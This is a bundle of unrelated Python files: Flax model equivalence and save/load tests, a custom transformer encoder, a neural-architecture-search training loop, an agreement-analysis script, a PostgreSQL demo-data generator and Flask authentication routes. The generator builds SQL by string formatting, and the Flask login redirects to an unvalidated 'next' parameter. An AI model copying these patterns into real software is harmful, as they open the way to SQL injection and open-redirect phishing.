for tuple_iterable_value, dict_iterable_value in zip(tuple_object, dict_object):
recursive_check(tuple_iterable_value, dict_iterable_value)
elif tuple_object is None:
return
else:
self.assert_almost_equals(
set_nan_tensor_to_zero(tuple_object), set_nan_tensor_to_zero(dict_object), 1e-5
)
recursive_check(tuple_output, dict_output)
for model_class in self.all_model_classes:
model = model_class(config)
tuple_inputs = self._prepare_for_class(inputs_dict, model_class)
dict_inputs = self._prepare_for_class(inputs_dict, model_class)
check_equivalence(model, tuple_inputs, dict_inputs)
tuple_inputs = self._prepare_for_class(inputs_dict, model_class)
dict_inputs = self._prepare_for_class(inputs_dict, model_class)
check_equivalence(model, tuple_inputs, dict_inputs, {"output_hidden_states": True})
@is_pt_flax_cross_test
def test_equivalence_pt_to_flax(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
# prepare inputs
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
pt_inputs = {k: torch.tensor(v.tolist()) for k, v in prepared_inputs_dict.items()}
# load corresponding PyTorch class
pt_model_class_name = model_class.__name__[4:] # Skip the "Flax" at the beginning
pt_model_class = getattr(transformers, pt_model_class_name)
pt_model = pt_model_class(config).eval()
# Flax models don't use the `use_cache` option and cache is not returned as a default.
# So we disable `use_cache` here for PyTorch model.
pt_model.config.use_cache = False
fx_model = model_class(config, dtype=jnp.float32)
fx_state = convert_pytorch_state_dict_to_flax(pt_model.state_dict(), fx_model)
fx_model.params = fx_state
with torch.no_grad():
pt_outputs = pt_model(**pt_inputs).to_tuple()
fx_outputs = fx_model(**prepared_inputs_dict).to_tuple()
self.assertEqual(len(fx_outputs), len(pt_outputs), "Output lengths differ between Flax and PyTorch")
for fx_output, pt_output in zip(fx_outputs, pt_outputs):
self.assert_almost_equals(fx_output, pt_output.numpy(), 4e-2)
with tempfile.TemporaryDirectory() as tmpdirname:
pt_model.save_pretrained(tmpdirname)
fx_model_loaded = model_class.from_pretrained(tmpdirname, from_pt=True)
fx_outputs_loaded = fx_model_loaded(**prepared_inputs_dict).to_tuple()
self.assertEqual(
len(fx_outputs_loaded), len(pt_outputs), "Output lengths differ between Flax and PyTorch"
)
for fx_output_loaded, pt_output in zip(fx_outputs_loaded, pt_outputs):
self.assert_almost_equals(fx_output_loaded, pt_output.numpy(), 4e-2)
@is_pt_flax_cross_test
def test_equivalence_flax_to_pt(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
# prepare inputs
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
pt_inputs = {k: torch.tensor(v.tolist()) for k, v in prepared_inputs_dict.items()}
# load corresponding PyTorch class
pt_model_class_name = model_class.__name__[4:] # Skip the "Flax" at the beginning
pt_model_class = getattr(transformers, pt_model_class_name)
pt_model = pt_model_class(config).eval()
# Flax models don't use the `use_cache` option and cache is not returned as a default.
# So we disable `use_cache` here for PyTorch model.
pt_model.config.use_cache = False
fx_model = model_class(config, dtype=jnp.float32)
pt_model = load_flax_weights_in_pytorch_model(pt_model, fx_model.params)
# make sure weights are tied in PyTorch
pt_model.tie_weights()
with torch.no_grad():
pt_outputs = pt_model(**pt_inputs).to_tuple()
fx_outputs = fx_model(**prepared_inputs_dict).to_tuple()
self.assertEqual(len(fx_outputs), len(pt_outputs), "Output lengths differ between Flax and PyTorch")
for fx_output, pt_output in zip(fx_outputs, pt_outputs):
self.assert_almost_equals(fx_output, pt_output.numpy(), 4e-2)
with tempfile.TemporaryDirectory() as tmpdirname:
fx_model.save_pretrained(tmpdirname)
pt_model_loaded = pt_model_class.from_pretrained(tmpdirname, from_flax=True)
with torch.no_grad():
pt_outputs_loaded = pt_model_loaded(**pt_inputs).to_tuple()
self.assertEqual(
len(fx_outputs), len(pt_outputs_loaded), "Output lengths differ between Flax and PyTorch"
)
for fx_output, pt_output in zip(fx_outputs, pt_outputs_loaded):
self.assert_almost_equals(fx_output, pt_output.numpy(), 4e-2)
def test_from_pretrained_save_pretrained(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
model = model_class(config)
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
outputs = model(**prepared_inputs_dict).to_tuple()
# verify that normal save_pretrained works as expected
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname)
model_loaded = model_class.from_pretrained(tmpdirname)
outputs_loaded = model_loaded(**prepared_inputs_dict).to_tuple()
for output_loaded, output in zip(outputs_loaded, outputs):
self.assert_almost_equals(output_loaded, output, 1e-3)
# verify that save_pretrained for distributed training
# with `params=params` works as expected
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname, params=model.params)
model_loaded = model_class.from_pretrained(tmpdirname)
outputs_loaded = model_loaded(**prepared_inputs_dict).to_tuple()
for output_loaded, output in zip(outputs_loaded, outputs):
self.assert_almost_equals(output_loaded, output, 1e-3)
def test_save_load_from_base(self):
config, _ = self.model_tester.prepare_config_and_inputs_for_common()
base_class = FLAX_MODEL_MAPPING[config.__class__]
for model_class in self.all_model_classes:
if model_class == base_class:
continue
model = base_class(config)
base_params = flatten_dict(unfreeze(model.params))
# check that all base model weights are loaded correctly
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname)
head_model = model_class.from_pretrained(tmpdirname)
base_param_from_head = flatten_dict(unfreeze(head_model.params[head_model.base_model_prefix]))
for key in base_param_from_head.keys():
max_diff = (base_params[key] - base_param_from_head[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
def test_save_load_to_base(self):
config, _ = self.model_tester.prepare_config_and_inputs_for_common()
base_class = FLAX_MODEL_MAPPING[config.__class__]
for model_class in self.all_model_classes:
if model_class == base_class:
continue
model = model_class(config)
base_params_from_head = flatten_dict(unfreeze(model.params[model.base_model_prefix]))
# check that all base model weights are loaded correctly
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname)
base_model = base_class.from_pretrained(tmpdirname)
base_params = flatten_dict(unfreeze(base_model.params))
for key in base_params_from_head.keys():
max_diff = (base_params[key] - base_params_from_head[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
@is_pt_flax_cross_test
def test_save_load_from_base_pt(self):
config, _ = self.model_tester.prepare_config_and_inputs_for_common()
base_class = FLAX_MODEL_MAPPING[config.__class__]
for model_class in self.all_model_classes:
if model_class == base_class:
continue
model = base_class(config)
base_params = flatten_dict(unfreeze(model.params))
# convert Flax model to PyTorch model
pt_model_class = getattr(transformers, base_class.__name__[4:]) # Skip the "Flax" at the beginning
pt_model = pt_model_class(config).eval()
pt_model = load_flax_weights_in_pytorch_model(pt_model, model.params)
# check that all base model weights are loaded correctly
with tempfile.TemporaryDirectory() as tmpdirname:
# save pt model
pt_model.save_pretrained(tmpdirname)
head_model = model_class.from_pretrained(tmpdirname, from_pt=True)
base_param_from_head = flatten_dict(unfreeze(head_model.params[head_model.base_model_prefix]))
for key in base_param_from_head.keys():
max_diff = (base_params[key] - base_param_from_head[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
@is_pt_flax_cross_test
def test_save_load_to_base_pt(self):
config, _ = self.model_tester.prepare_config_and_inputs_for_common()
base_class = FLAX_MODEL_MAPPING[config.__class__]
for model_class in self.all_model_classes:
if model_class == base_class:
continue
model = model_class(config)
base_params_from_head = flatten_dict(unfreeze(model.params[model.base_model_prefix]))
# convert Flax model to PyTorch model
pt_model_class = getattr(transformers, model_class.__name__[4:]) # Skip the "Flax" at the beginning
pt_model = pt_model_class(config).eval()
pt_model = load_flax_weights_in_pytorch_model(pt_model, model.params)
# check that all base model weights are loaded correctly
with tempfile.TemporaryDirectory() as tmpdirname:
pt_model.save_pretrained(tmpdirname)
base_model = base_class.from_pretrained(tmpdirname, from_pt=True)
base_params = flatten_dict(unfreeze(base_model.params))
for key in base_params_from_head.keys():
max_diff = (base_params[key] - base_params_from_head[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
@slow
def test_jit_compilation(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
model = model_class(config)
@jax.jit
def model_jitted(input_ids, attention_mask=None, **kwargs):
return model(input_ids=input_ids, attention_mask=attention_mask, **kwargs)
with self.subTest("JIT Enabled"):
jitted_outputs = model_jitted(**prepared_inputs_dict).to_tuple()
with self.subTest("JIT Disabled"):
with jax.disable_jit():
outputs = model_jitted(**prepared_inputs_dict).to_tuple()
self.assertEqual(len(outputs), len(jitted_outputs))
for jitted_output, output in zip(jitted_outputs, outputs):
self.assertEqual(jitted_output.shape, output.shape)
def test_forward_signature(self):
config, _ = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
model = model_class(config)
signature = inspect.signature(model.__call__)
# signature.parameters is an OrderedDict => so arg_names order is deterministic
arg_names = [*signature.parameters.keys()]
if model.config.is_encoder_decoder:
expected_arg_names = [
"input_ids",
"attention_mask",
"decoder_input_ids",
"decoder_attention_mask",
]
self.assertListEqual(arg_names[: len(expected_arg_names)], expected_arg_names)
else:
expected_arg_names = ["input_ids", "attention_mask"]
self.assertListEqual(arg_names[:2], expected_arg_names)
def test_naming_convention(self):
for model_class in self.all_model_classes:
model_class_name = model_class.__name__
module_class_name = (
model_class_name[:-5] + "Module" if model_class_name[-5:] == "Model" else model_class_name + "Module"
)
bert_modeling_flax_module = __import__(model_class.__module__, fromlist=[module_class_name])
module_cls = getattr(bert_modeling_flax_module, module_class_name)
self.assertIsNotNone(module_cls)
def test_hidden_states_output(self):
def check_hidden_states_output(inputs_dict, config, model_class):
model = model_class(config)
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
hidden_states = outputs.encoder_hidden_states if config.is_encoder_decoder else outputs.hidden_states
expected_num_layers = getattr(
self.model_tester, "expected_num_hidden_layers", self.model_tester.num_hidden_layers + 1
)
self.assertEqual(len(hidden_states), expected_num_layers)
if hasattr(self.model_tester, "encoder_seq_length"):
seq_length = self.model_tester.encoder_seq_length
else:
seq_length = self.model_tester.seq_length
self.assertListEqual(
list(hidden_states[0].shape[-2:]),
[seq_length, self.model_tester.hidden_size],
)
if config.is_encoder_decoder:
hidden_states = outputs.decoder_hidden_states
self.assertIsInstance(hidden_states, (list, tuple))
self.assertEqual(len(hidden_states), expected_num_layers)
seq_len = getattr(self.model_tester, "seq_length", None)
decoder_seq_length = getattr(self.model_tester, "decoder_seq_length", seq_len)
self.assertListEqual(
list(hidden_states[0].shape[-2:]),
[decoder_seq_length, self.model_tester.hidden_size],
)
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
inputs_dict["output_hidden_states"] = True
check_hidden_states_output(inputs_dict, config, model_class)
# check that output_hidden_states also work using config
del inputs_dict["output_hidden_states"]
config.output_hidden_states = True
check_hidden_states_output(inputs_dict, config, model_class)
def test_attention_outputs(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
config.return_dict = True
seq_length = getattr(self.model_tester, "seq_length", None)
decoder_seq_length = getattr(self.model_tester, "decoder_seq_length", seq_length)
encoder_seq_length = getattr(self.model_tester, "encoder_seq_length", seq_length)
decoder_key_length = getattr(self.model_tester, "decoder_key_length", decoder_seq_length)
encoder_key_length = getattr(self.model_tester, "key_length", encoder_seq_length)
for model_class in self.all_model_classes:
inputs_dict["output_attentions"] = True
inputs_dict["output_hidden_states"] = False
model = model_class(config)
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs.encoder_attentions if config.is_encoder_decoder else outputs.attentions
self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)
# check that output_attentions also work using config
del inputs_dict["output_attentions"]
config.output_attentions = True
model = model_class(config)
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs.encoder_attentions if config.is_encoder_decoder else outputs.attentions
self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(attentions[0].shape[-3:]),
[self.model_tester.num_attention_heads, encoder_seq_length, encoder_key_length],
)
out_len = len(outputs)
if self.is_encoder_decoder:
correct_outlen = 5
# Question Answering model returns start_logits and end_logits
if model_class in get_values(FLAX_MODEL_FOR_QUESTION_ANSWERING_MAPPING):
correct_outlen += 1 # start_logits and end_logits instead of only 1 output
self.assertEqual(out_len, correct_outlen)
# decoder attentions
decoder_attentions = outputs.decoder_attentions
self.assertIsInstance(decoder_attentions, (list, tuple))
self.assertEqual(len(decoder_attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(decoder_attentions[0].shape[-3:]),
[self.model_tester.num_attention_heads, decoder_seq_length, decoder_key_length],
)
# cross attentions
cross_attentions = outputs.cross_attentions
self.assertIsInstance(cross_attentions, (list, tuple))
self.assertEqual(len(cross_attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(cross_attentions[0].shape[-3:]),
[
self.model_tester.num_attention_heads,
decoder_seq_length,
encoder_key_length,
],
)
# Check attention is always last and order is fine
inputs_dict["output_attentions"] = True
inputs_dict["output_hidden_states"] = True
model = model_class(config)
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
if hasattr(self.model_tester, "num_hidden_states_types"):
added_hidden_states = self.model_tester.num_hidden_states_types
elif self.is_encoder_decoder:
added_hidden_states = 2
else:
added_hidden_states = 1
self.assertEqual(out_len + added_hidden_states, len(outputs))
self_attentions = outputs.encoder_attentions if config.is_encoder_decoder else outputs.attentions
self.assertEqual(len(self_attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(self_attentions[0].shape[-3:]),
[self.model_tester.num_attention_heads, encoder_seq_length, encoder_key_length],
)
def test_load_with_mismatched_shapes(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
if model_class not in get_values(FLAX_MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING):
continue
with self.subTest(msg=f"Testing {model_class}"):
with tempfile.TemporaryDirectory() as tmp_dir:
model = model_class(config)
model.save_pretrained(tmp_dir)
# Fails when we don't set ignore_mismatched_sizes=True
with self.assertRaises(ValueError):
new_model = FlaxAutoModelForSequenceClassification.from_pretrained(tmp_dir, num_labels=42)
logger = logging.get_logger("transformers.modeling_flax_utils")
with CaptureLogger(logger) as cl:
new_model = FlaxAutoModelForSequenceClassification.from_pretrained(
tmp_dir, num_labels=42, ignore_mismatched_sizes=True
)
self.assertIn("the shapes did not match", cl.out)
logits = new_model(**inputs_dict)["logits"]
self.assertEqual(logits.shape[1], 42)
@require_flax
@is_staging_test
class FlaxModelPushToHubTester(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._api = HfApi(endpoint=ENDPOINT_STAGING)
cls._token = cls._api.login(username=USER, password=PASS)
@classmethod
def tearDownClass(cls):
try:
cls._api.delete_repo(token=cls._token, name="test-model-flax")
except HTTPError:
pass
try:
cls._api.delete_repo(token=cls._token, name="test-model-flax-org", organization="valid_org")
except HTTPError:
pass
def test_push_to_hub(self):
config = BertConfig(
vocab_size=99, hidden_size=32, num_hidden_layers=5, num_attention_heads=4, intermediate_size=37
)
model = FlaxBertModel(config)
with tempfile.TemporaryDirectory() as tmp_dir:
model.save_pretrained(
os.path.join(tmp_dir, "test-model-flax"), push_to_hub=True, use_auth_token=self._token
)
new_model = FlaxBertModel.from_pretrained(f"{USER}/test-model-flax")
base_params = flatten_dict(unfreeze(model.params))
new_params = flatten_dict(unfreeze(new_model.params))
for key in base_params.keys():
max_diff = (base_params[key] - new_params[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
def test_push_to_hub_in_organization(self):
config = BertConfig(
vocab_size=99, hidden_size=32, num_hidden_layers=5, num_attention_heads=4, intermediate_size=37
)
model = FlaxBertModel(config)
with tempfile.TemporaryDirectory() as tmp_dir:
model.save_pretrained(
os.path.join(tmp_dir, "test-model-flax-org"),
push_to_hub=True,
use_auth_token=self._token,
organization="valid_org",
)
new_model = FlaxBertModel.from_pretrained("valid_org/test-model-flax-org")
base_params = flatten_dict(unfreeze(model.params))
new_params = flatten_dict(unfreeze(new_model.params))
for key in base_params.keys():
max_diff = (base_params[key] - new_params[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
|
import torch
from torch import nn
from .attention import CustomMultiHeadAttention
from .blocks import PositionwiseFeedForward, CustomLayerNorm
from .position_layers import PositionEncoding
class CustomEncoderLayer(nn.Module):
def __init__(self, dim, n_head, ffn_hidden=None, dropout=0.0):
"""
Encoder block
:param dim: Embedding dimension
        :param n_head: Number of heads in multi-head attention
:param ffn_hidden: Number of hidden nodes of feed forward layer
:param dropout: Dropout rate in the block
"""
super(CustomEncoderLayer, self).__init__()
self.multiheadatt = CustomMultiHeadAttention(dim, n_head)
self.norm1 = CustomLayerNorm(dim)
self.dropout1 = nn.Dropout(p=dropout)
self.ffn = PositionwiseFeedForward(dim, ffn_hidden, dropout=dropout)
self.norm2 = CustomLayerNorm(dim)
self.dropout2 = nn.Dropout(p=dropout)
def forward(self, x, mask=None):
# Compute attention
_x = x
x = self.multiheadatt(x, x, x, mask=mask)
# add norm
x = self.norm1(x + _x)
x = self.dropout1(x)
# feed forward
_x = x
x = self.ffn(x)
# add norm
x = self.norm2(x + _x)
x = self.dropout2(x)
return x
class CustomEncoder(nn.Module):
def __init__(self, vocab_size, max_len, dim, ffn_hidden, n_head, n_layers, dropout=0.1):
"""
Encoder (n x encode layer)
:param vocab_size: Input vocab size for embedding
:param max_len: Maximum length of position embedding
:param dim: Embedding dimension
:param ffn_hidden: Number of hidden nodes of feed forward layer
        :param n_head: Number of heads in multi-head attention
:param n_layers: Number of repeated encoder layers
:param dropout: Dropout rate of encoder
"""
super(CustomEncoder, self).__init__()
self.embed = nn.Embedding(vocab_size, dim, padding_idx=1)
self.position = PositionEncoding(dim, dropout=dropout, max_len=max_len)
self.layers = nn.ModuleList([CustomEncoderLayer(dim,
n_head,
ffn_hidden,
dropout)
for _ in range(n_layers)])
def forward(self, x, mask=None):
x = self.embed(x)
x = self.position(x)
for layer in self.layers:
x = layer(x, mask)
return x
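# Shape-check sketch (assumes the relative modules above are importable as a package;
# the hyperparameters are arbitrary). A batch of token ids of shape (batch, seq_len)
# comes back as contextual embeddings of shape (batch, seq_len, dim):
#
#     encoder = CustomEncoder(vocab_size=1000, max_len=128, dim=64,
#                             ffn_hidden=256, n_head=4, n_layers=2, dropout=0.1)
#     tokens = torch.randint(0, 1000, (2, 16))
#     out = encoder(tokens)    # -> torch.Size([2, 16, 64])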
|
##################################################
# Copyright (c) Xuanyi Dong [GitHub D-X-Y], 2019 #
##################################################
import os, sys, time, torch
# modules in AutoDL
from log_utils import AverageMeter, time_string
from models import change_key
from .eval_funcs import obtain_accuracy
def get_flop_loss(expected_flop, flop_cur, flop_need, flop_tolerant):
expected_flop = torch.mean(expected_flop)
if flop_cur < flop_need - flop_tolerant: # Too Small FLOP
loss = -torch.log(expected_flop)
# elif flop_cur > flop_need + flop_tolerant: # Too Large FLOP
elif flop_cur > flop_need: # Too Large FLOP
loss = torch.log(expected_flop)
else: # Required FLOP
loss = None
if loss is None:
return 0, 0
else:
return loss, loss.item()
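# Worked example (illustrative): with flop_need=100 and flop_tolerant=5, a model currently at
# flop_cur=80 is below the tolerated band, so the loss is -log(E[flop]), which pushes the
# expected FLOP count up; at flop_cur=110 the loss is +log(E[flop]), pushing it down; values
# inside the band contribute (0, 0).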
def search_train_v2(
search_loader,
network,
criterion,
scheduler,
base_optimizer,
arch_optimizer,
optim_config,
extra_info,
print_freq,
logger,
):
data_time, batch_time = AverageMeter(), AverageMeter()
base_losses, arch_losses, top1, top5 = (
AverageMeter(),
AverageMeter(),
AverageMeter(),
AverageMeter(),
)
arch_cls_losses, arch_flop_losses = AverageMeter(), AverageMeter()
epoch_str, flop_need, flop_weight, flop_tolerant = (
extra_info["epoch-str"],
extra_info["FLOP-exp"],
extra_info["FLOP-weight"],
extra_info["FLOP-tolerant"],
)
network.train()
logger.log(
"[Search] : {:}, FLOP-Require={:.2f} MB, FLOP-WEIGHT={:.2f}".format(
epoch_str, flop_need, flop_weight
)
)
end = time.time()
network.apply(change_key("search_mode", "search"))
for step, (base_inputs, base_targets, arch_inputs, arch_targets) in enumerate(
search_loader
):
scheduler.update(None, 1.0 * step / len(search_loader))
# calculate prediction and loss
base_targets = base_targets.cuda(non_blocking=True)
arch_targets = arch_targets.cuda(non_blocking=True)
# measure data loading time
data_time.update(time.time() - end)
# update the weights
base_optimizer.zero_grad()
logits, expected_flop = network(base_inputs)
base_loss = criterion(logits, base_targets)
base_loss.backward()
base_optimizer.step()
# record
prec1, prec5 = obtain_accuracy(logits.data, base_targets.data, topk=(1, 5))
base_losses.update(base_loss.item(), base_inputs.size(0))
top1.update(prec1.item(), base_inputs.size(0))
top5.update(prec5.item(), base_inputs.size(0))
# update the architecture
arch_optimizer.zero_grad()
logits, expected_flop = network(arch_inputs)
flop_cur = network.module.get_flop("genotype", None, None)
flop_loss, flop_loss_scale = get_flop_loss(
expected_flop, flop_cur, flop_need, flop_tolerant
)
acls_loss = criterion(logits, arch_targets)
arch_loss = acls_loss + flop_loss * flop_weight
arch_loss.backward()
arch_optimizer.step()
# record
arch_losses.update(arch_loss.item(), arch_inputs.size(0))
arch_flop_losses.update(flop_loss_scale, arch_inputs.size(0))
arch_cls_losses.update(acls_loss.item(), arch_inputs.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if step % print_freq == 0 or (step + 1) == len(search_loader):
Sstr = (
"**TRAIN** "
+ time_string()
+ " [{:}][{:03d}/{:03d}]".format(epoch_str, step, len(search_loader))
)
Tstr = "Time {batch_time.val:.2f} ({batch_time.avg:.2f}) Data {data_time.val:.2f} ({data_time.avg:.2f})".format(
batch_time=batch_time, data_time=data_time
)
Lstr = "Base-Loss {loss.val:.3f} ({loss.avg:.3f}) Prec@1 {top1.val:.2f} ({top1.avg:.2f}) Prec@5 {top5.val:.2f} ({top5.avg:.2f})".format(
loss=base_losses, top1=top1, top5=top5
)
Vstr = "Acls-loss {aloss.val:.3f} ({aloss.avg:.3f}) FLOP-Loss {floss.val:.3f} ({floss.avg:.3f}) Arch-Loss {loss.val:.3f} ({loss.avg:.3f})".format(
aloss=arch_cls_losses, floss=arch_flop_losses, loss=arch_losses
)
logger.log(Sstr + " " + Tstr + " " + Lstr + " " + Vstr)
# num_bytes = torch.cuda.max_memory_allocated( next(network.parameters()).device ) * 1.0
# logger.log(Sstr + ' ' + Tstr + ' ' + Lstr + ' ' + Vstr + ' GPU={:.2f}MB'.format(num_bytes/1e6))
# Istr = 'Bsz={:} Asz={:}'.format(list(base_inputs.size()), list(arch_inputs.size()))
# logger.log(Sstr + ' ' + Tstr + ' ' + Lstr + ' ' + Vstr + ' ' + Istr)
# print(network.module.get_arch_info())
# print(network.module.width_attentions[0])
# print(network.module.width_attentions[1])
logger.log(
" **TRAIN** Prec@1 {top1.avg:.2f} Prec@5 {top5.avg:.2f} Error@1 {error1:.2f} Error@5 {error5:.2f} Base-Loss:{baseloss:.3f}, Arch-Loss={archloss:.3f}".format(
top1=top1,
top5=top5,
error1=100 - top1.avg,
error5=100 - top5.avg,
baseloss=base_losses.avg,
archloss=arch_losses.avg,
)
)
return base_losses.avg, arch_losses.avg, top1.avg, top5.avg
|
"""Second quick script to analyze the original method of evaluating agreement predictions."""
import os
import numpy as np
import pandas as pd
from tqdm import tqdm
from filenames import CLOZE_DIR, FEATURES_DIR, PROBABILITIES_DIR
cols = ["number", "gender", "case", "person"]
languages = os.listdir(PROBABILITIES_DIR)
for lg in ["hun", "gle", "fin"]: # already done
languages.remove(lg)
for lg in languages:
results = []
print(lg)
features_filename = os.path.join(FEATURES_DIR, f"{lg}.csv")
features = pd.read_csv(features_filename, dtype={"person": str})
cloze_filename = os.path.join(CLOZE_DIR, f"{lg}.csv")
cloze = pd.read_csv(cloze_filename)
for _, row in tqdm(cloze.iterrows()):
uid = row["uid"]
pos = row["pos"]
probabilities_filename = os.path.join(PROBABILITIES_DIR, lg, f"{uid}.csv")
try: # we may have skipped this cloze example
probs = pd.read_csv(probabilities_filename)
lemma = row["lemma"]
correct_form = row["correct_form"]
p_correct_form = probs[probs["word"] == correct_form]["p"].max()
if np.isnan(
p_correct_form
): # the correct form didn't appear in the lexicon
continue
else:
is_same_pos = features["pos"] == pos
is_different_lemma = features["lemma"] != lemma
other_lemmata = features[is_same_pos & is_different_lemma]
if (
other_lemmata.empty
): # we don't have feature data on any other lemmata
continue
else:
num_lemmata = len(other_lemmata["lemma"].unique())
merged = pd.merge(
probs, other_lemmata, left_on=["word"], right_on=["word"]
)
merged["correct"] = (merged[cols] == row[cols]).all(axis=1)
incorrect_forms = merged[~merged["correct"]]
lemmata = incorrect_forms["lemma"]
grouped = merged[merged["lemma"].isin(lemmata)].groupby("lemma")
count = 0
for _, group in grouped:
try:
p_correct = group[group["correct"]]["p"].max()
try:
p_incorrect = group[~group["correct"]]["p"].max()
if p_incorrect >= p_correct:
count += 1
except KeyError:
continue
except KeyError:
continue
example = {
"lg": lg,
"uid": uid,
"lemma": lemma,
"correct_form": correct_form,
"num_incorrect_lemmata": count,
"num_lemmata": num_lemmata,
}
results.append(example)
except FileNotFoundError:
continue
results = pd.DataFrame(results)
results["percentage"] = 100 * (
results["num_incorrect_lemmata"] / results["num_lemmata"]
)
results.to_csv(f"data/bylemmata/{lg}.csv", index=False)
|
import random
import os
from urllib.parse import urlparse, parse_qs
import psycopg2
import sys
import time
import yaml
def parse_conf(conf_path):
with open(conf_path, 'r') as f:
        conf = yaml.safe_load(f)
uri = conf['inputURI']
uri = uri[uri.find(':')+1:]
u = urlparse(uri)
query = parse_qs(u.query)
return u.path[1:], u.hostname, u.port, query['user'][0], query['password'][0], conf['table']
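# parse_conf expects a small YAML file holding a JDBC-style connection URI; a minimal
# sketch of the expected layout (the URI below is an assumption; only the 'inputURI'
# and 'table' keys are read):
#
#   inputURI: jdbc:postgresql://localhost:5432/postgres?user=postgres&password=secret
#   table: readings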
conf_path = os.path.dirname(os.path.realpath(__file__)) + '/../stream_sql.yaml'
if len(sys.argv) > 1:
conf_path = sys.argv[1]
dbname, host, port, user, password, table = parse_conf(conf_path)
conn = psycopg2.connect("dbname='postgres'" +
(" host='" + host + "'") +
(" port="+str(port) if port else "") +
(" user="+user if user else "") +
(" password="+password if password else ""))
cur = conn.cursor()
firmwares = ["0.2.4", "0.3.1", "0.3.2", "0.4"]
models = ["M101", "M104", "M204", "M205", "M404", "M606"]
devices = [random.randint(100, 10000) for i in range(0, 100)]
if 2040 in devices:
devices.remove(2040)
states = ["CA", "MA", "NY", "WY", "AR", "NV"]
print("Creating table...")
cur.execute("DROP TABLE IF EXISTS {0}; CREATE TABLE {0} ( reading_id bigint NOT NULL, device_id bigint NOT NULL, state varchar(2), model varchar(40), firmware_version varchar(40), temperature numeric, power_drain numeric, time bigint NOT NULL );".format(table))
print("...created!")
r = 0
while True:
print("Inserting data")
readings = 500
    for i in range(0, int(readings) + random.randint(1, readings // 2)):  # randint needs integer bounds
r += 1
d_id = random.choice(devices)
state = random.choice(states)
model = random.choice(models)
firmware_version = random.choice(firmwares)
power_drain = .2+.2*random.random()
if (state == "CA" and model == "M101" and firmware_version == "0.4"):
temperature = 2 + random.random()*10
else:
temperature = 70+random.random()*10
sql = "INSERT INTO %s VALUES ('%s', '%s', '%s', '%s', '%s', %f, %f, %d);" % (table, r, d_id, state, model, firmware_version, temperature, power_drain, time.time() * 1000)
cur.execute(sql)
d_id = 2040
state = random.choice(states)
model = random.choice(models)
firmware_version = random.choice(firmwares)
    for i in range(0, int(readings * .01) + random.randint(1, readings // 2)):
r += 1
power_drain = .8 + random.random()*.2
if (state == "CA" and model == "M101" and firmware_version == "0.4"):
temperature = 2 + random.random()*10
else:
temperature = 70+random.random()*10
sql = "INSERT INTO %s VALUES ('%s', '%s', '%s', '%s', '%s', %f, %f, %d);" % (table, r, d_id, state, model, firmware_version, temperature, power_drain, time.time() * 1000)
cur.execute(sql)
conn.commit()
time.sleep(random.uniform(0.5, 2.5))
|
from flask import render_template,redirect,url_for, flash,request
from . import auth
from ..models import User,Blog,Comment
from .forms import RegistrationForm,LoginForm
from ..import db
from flask_login import login_user,logout_user,login_required
from ..email import mail_message
@auth.route('/register',methods = ["GET","POST"])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(email = form.email.data, username = form.username.data,password = form.password.data)
db.session.add(user)
db.session.commit()
mail_message("Welcome to Blog app","email/welcome_user",user.email,user=user)
return redirect(url_for('auth.login'))
title = "New Account"
    return render_template('auth/register.html', registration_form = form, title = title)
@auth.route('/login',methods=['GET','POST'])
def login():
login_form = LoginForm()
if login_form.validate_on_submit():
user = User.query.filter_by(email = login_form.email.data).first()
if user is not None and user.verify_password(login_form.password.data):
login_user(user,login_form.remember.data)
return redirect(request.args.get('next') or url_for('main.index'))
flash('Invalid username or Password')
title = "blog login"
return render_template('auth/login.html',login_form = login_form,title=title)
@auth.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for("main.index"))
|
#---import required modules
import requests
from tkinter import *
import tkinter as tk
from tkinter import ttk
from matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg,NavigationToolbar2Tk)
from matplotlib.figure import Figure
import base64
import calc
from datetime import (datetime, date)
#----creating the main window----
root = Tk()
root.overrideredirect(True)
root.geometry('700x500+250+100')
root.attributes('-topmost', True)
